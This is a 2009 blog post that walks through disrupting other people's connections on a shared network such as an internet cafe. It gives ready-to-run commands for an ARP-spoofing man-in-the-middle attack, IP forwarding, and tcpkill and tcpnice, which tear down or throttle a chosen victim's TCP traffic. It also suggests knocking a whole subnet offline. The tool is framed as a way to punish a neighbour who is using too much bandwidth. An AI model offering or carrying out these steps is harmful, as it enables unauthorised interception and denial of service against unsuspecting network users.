Wednesday, November 25, 2009

Tcpkill and tcpnice

Tcpkill is a program that can be used to kill live tcp connections to or from a host, network, port or a combination of them all. Similarly, Tcpnice doesnt necessarily kill the connections, but attempt to slow them down. Say you're at an internet cafe and some dude sitting next to you is hogging up all the bandwidth with his multiple torrent downloads of illegal software. You're at your machine and you are trying to upload some important documents to your website. The frustration grows as your uploads begin to time out. What can he do to mitigate this issue? Well thanks the Dug Song, we have two methods to irritate our neighbour.

First we need to perform a MITM man in the middle attack(arpspoof or ettercap shall do) and enable forwarding in your kernel as follows:

# echo 1 > /proc/sys/net/ipv4/ip _forward

We then need to determine what local ip is hogging up the bandwidth. There is a useful sniffer that i use call tcptrack that list the live connections that it sees and the bandwidth/speed of the data that is being transfered back and forth on each connection.

#tcptrack -i eth0

Once you determine the IP of the bandwidth hogger (in this example, 10.0.0.2), its time to unleash our magic.

# tcpkill -i eth0 -9 host 10.0.0.2

The '-9' Specifies the degree of brute force to use in killing a connec-tion. Fast connections may require a higher number in order to land a RST in the moving receive window(Thats the method used to kill connections, flood the recieve windows with RST packets to tear down connections). Default is 3.

this in turn would kill/block all of the traffic going to or from 10.0.0.2. If you wanted to be more specific and only block only the port that is using the most bandwidth, you can do this instead.

# tcpkill -i eth0 -9 host 10.0.0.2 and port 4455

Or if you're really mad at the world, you can wipe off the whole subnet.

# tcpkill -9 net 192.168.1

Similarly, tcpnice can be used to slow connections down, rather than to simply kill them.

# tcpnice -i eth0 -A host 10.0.0.2

[Options]
-A Inject TCP tiny window advertisements.
-I Inject ICMP source quench replies.
-M Inject ICMP fragmentation-needed replies with tiny next-hop MTUs.
-i interface to listen on
If no option (A,I,M) is given, all woud be used.

References/Good reading:
http://www.preterhuman.net/texts/underground/hacking/dsniff.txt
http://www.enterprisenetworkingplanet.com/netos/article.php/3564471


No comments:

Post a Comment